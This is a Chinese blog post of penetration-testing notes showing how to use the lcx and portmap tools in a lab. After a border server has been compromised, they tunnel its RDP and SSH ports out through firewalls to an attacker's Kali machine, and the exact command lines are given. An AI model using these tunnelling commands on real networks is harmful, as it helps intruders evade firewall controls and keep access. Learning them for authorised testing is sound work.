【渗透测试笔记】之【内网渗透——传输层隧道(lcx(portmap)的使用:边界服务器分别为Windows和Linux下本地端口映射、转发)】

最新推荐文章于 2024-06-11 01:15:41 发布
最新推荐文章于 2024-06-11 01:15:41 发布
阅读量1.9k 收藏 13
点赞数 3
分类专栏: 渗透测试 隐秘通信隧道技术 内网渗透 文章标签: ssh linux 渗透测试 内网渗透 域渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/120778974
版权

文章目录

实验环境

kali(攻击机,外网地址:192.168.8.48)
Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)
CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)
Windows2012(DC,内网地址:10.1.1.2)
在这里插入图片描述

1 下载与部署

下载地址:https://github.com/AA8j/SecTools/tree/main/lcx
注意:Linux下为portmap。

2 使用方法

2.1 本地端口映射

假如此时已经拿到了边界服务器的权限,但是由于防火墙策略限制导致3389端口无法出网,此时可以将此端口映射到可以出网的端口。

2.1.1 边界服务器为Windows的情况

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

lcx -tran 53 192.168.8.56 3389

在这里插入图片描述
效果演示
此时远程桌面连接192.168.8.56的53端口即可:
在这里插入图片描述
在这里插入图片描述
此时会有数据日志:
在这里插入图片描述

2.1.2 边界服务器为Linux的情况

使用ssh端口转发更方便。在应用层隧道会讲到。

2.2 本地端口转发

假如此时已经拿到了边界服务器Windows2012的权限,但是由于防火墙限制,进网端口被限制,但可以出网,此时就可以将边界服务器的端口转发到kali上,然后访问kali的端口。

2.2.1 边界服务器为Windows的情况

kali(攻击机,外网地址:192.168.8.48)

./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 3389

./portmap -m 2 -p1 4444(本机监听端口) -h2 127.0.0.1(转发到目的IP) -p2 3389(转发到目的端口)
# 表示监听本机的4444端口,并转发到127.0.0.1的3389端口。


m的参数说明:
1.监听port1 (p1)端口并且连接主机2(h2)的port2(p2) 端口
2.监听port1(p1)和port2(p2) 端口
3.连接主机1(h1)对应的端口和主机2(h2)对应的端口

在这里插入图片描述

Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)

lcx.exe -slave 192.168.8.48 4444 127.0.0.1 3389

lcx.exe -slave 192.168.8.48(转发到目的IP) 4444(转发到目的端口) 127.0.0.1 3389(转发的本地端口)
# 表示将本地的3389端口转发到192.168.8.48的4444端口

在这里插入图片描述

效果演示
此时通道就已经打通了,远程桌面连接kali(192.168.8.48)即会连接到内网的Windows2012。
在这里插入图片描述
在这里插入图片描述
此时两端都会有数据日志显示:
在这里插入图片描述
在这里插入图片描述

2.2.2 边界服务器为Linux的情况

kali(攻击机,外网地址:192.168.8.48)

./portmap -m 2 -p1 4444 -h2 127.0.0.1 -p2 222

./portmap -m 2 -p1 4444(本机监听端口) -h2 127.0.0.1(转发到目的IP) -p2 222(转发到目的端口)
# 表示监听本机的4444端口,并转发到127.0.0.1的222端口。

在这里插入图片描述

CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.8.48 -p2 4444

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.8.48(kali) -p2 4444
# 将本地的22端口转发到192.168.8.48的4444端口

在这里插入图片描述

效果演示
此时CentOS7(边界服务器,外网地址:192.168.8.13,内网地址:10.1.1.13)的ssh端口就被转发到了kali(攻击机,外网地址:192.168.8.48)的222端口上,尝试连接:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
此时两端同样有数据日志:
在这里插入图片描述
在这里插入图片描述

AA8j
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透---lcx使用
Armandhe的博客
06-21 499
lcx超简单
PortMap1.6与使用说明书
06-13
大家出于安全考虑在内网环境中建立数据中心服务器,但要通过 Internet访问内网中的服务器,必须进行端口映射。而实现端口映射的方法很多,在此向大家推荐一款端口映射软件PortMap。在PortMap的帮助下,大家只要进行一些简单的操作就可以实现外网访问内网的功能.
检测到远端RPCBIND/PORTMAP正在运行中(CVE-1999-0632)
最新发布
ideal-lingyun
06-11 594
检测到远端RPCBIND/PORTMAP正在运行中(CVE-1999-0632)
lcx内网穿神器linuxportmap使用
黑锤的博客
11-04 8835
本次笔记主要是讲解如何将一个处于内网主机的linux系统的22端口转发到公网的7777端口上,然后就可以利用ssh连接公网的7777端口来进行访问内网主机。 本次环境 1.一台linux系统的内网主机192.168.233.140(这里我用的是kali) 2.公网ip(这里是我在阿里云买的服务器:47.93.xxx.xxx) 3.随意一台linux系统的内网主机(这里我用的是ubuntu):就是用...
内网渗透工具介绍------Lcx.exe
weixin_34148508的博客
05-11 461
0x00简介 Lcx是一款端口转发工具,可以将内网机器的端口映射到带公网IP的机器上。一般进行渗透的时候,通过web漏洞getshell之后,需要对其进行远程登录,这就需要用到端口映射。 0x01使用 第一步:在内网主机上上传lcx.exe文件,执行 Lcx.exe –slave RemoteHost RemotePort LocalHost LocalPort 如图中显示则连接成功 第二步:...
端口转发lcxportmap结合利用
Zlirving_的博客
02-12 922
目录端口转发端口转发端口映射的区别工具介绍lcxportmap实验利用总结 端口转发 端口转发Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。 比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑
网络测试中端口转发工具(lcx.exe,portmap)利用简析
Alexz__的博客
03-30 4390
1,端口转发含义 2,lcx.exe工具使用 3,portmap脚本使用 4,简单的ssh登录端口转发 5,端口转发实现http包转发 壹 什么是端口转发 端口转发,有时也被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局网内...
lcx-windows-linux-源代码
02-14
5. **编译和构建**: 使用这些源代码,开发者需要了解如何在WindowsLinux环境下分别编译和构建应用程序。这可能涉及到设置合适的编译器(如GCC或Visual Studio)、链接器和其他构建工具。 6. **调试与测试**: 对于...
lcx.exe32位和lcx64.exe位端口映射.rar
03-19
LCX是一款强大的内网穿透工具,它提供了32位和64位的版本,分别为`lcx.exe`和`lcx64.exe`,适用于不同的操作系统环境。此压缩包包含了这两个版本的执行文件以及相关说明,旨在帮助用户进行端口映射操作,从而在不同...
如何优雅的穿透linux内网.pdf
08-07
渗透的一个linux主机之后进入内网,虽然可以建立一个bugscan扫描节点进行内网扫描。但要进一步渗透,就需要接入内网。如何nc,lcx转发只能一个端口转一个端口。显然不能满足要求。通过ssh虽然能建立socks代理,但得...
端口映射器 端口转发 PortMap1.6
08-09
端口映射器 端口转发 PortMap1.6
lcx_portmap.zip
05-17
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmaplcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran)
内网渗透利器lcx使用教程
08-19
LCX大家都很熟悉吧,实现的是端口转发的功能,适用于内网渗透已经远程控制等,发给新手学习
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
portmap 端口转发
ailx10
07-23 2221
前面我们已经学习了ssh端口转发、防火墙端口转发、rinetd端口转发、nc端口转发、socat端口转发,今天我们来学习portmap 端口转发portmapLinux下的LCX,那么自然先来回顾一下windows下的LCX:「ailx10:Lcx端口转发初探」,这个实验当初真的耗费很大心血,真的不容易,现在复习一遍,感觉非常简单,恐怕这就叫成长吧,文章末尾有彩蛋~实验环境:macos:19...
什么是边缘服务器
嘻嘻哈哈.Net
07-17 6293
 什么是边缘服务器?  发表时间:2005-12-05 15:06:03  作者:CBINews编辑  阅读次数:536 随着互联网及其应用的快速发展,绝大多数企业都建立自己的网站,增强对外联络,加速业务流程,客户对网站系统访问的响应时间,网站内容以及所提供服务的可靠性,即时性等要求也越来越高,使得以单台服务器来支撑整个网站的系统已无法满足客户需求,取而代之的是采用两到三层架构的一组服务器
传输层LCX隧道
战神/calmness的博客
11-19 279
https://github.com/inquisb/icmpsh 准备: kali 192.168.243.141 win7 192.168.243.154 icmp隧道搭建
黑客利用开放的Portmap放大DDoS攻击
weixin_34217773的博客
08-01 658
2015年8月19日在15点11分,安全观察员约翰·莱顿对于新一类能造成大程度攻击威胁的DDoS攻击威胁发出过警告,当太多用户未能遵守基本的安全保障时便会造成这种威胁。 错误配置的服务如DNS或网络时间协议(NTP)在过去的几年中,导致了一系列的DDOS攻击。并且其中最引人注目的一次攻击是在2013年3月,Spamhaus和互联网交易都相继被攻破。在最近...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值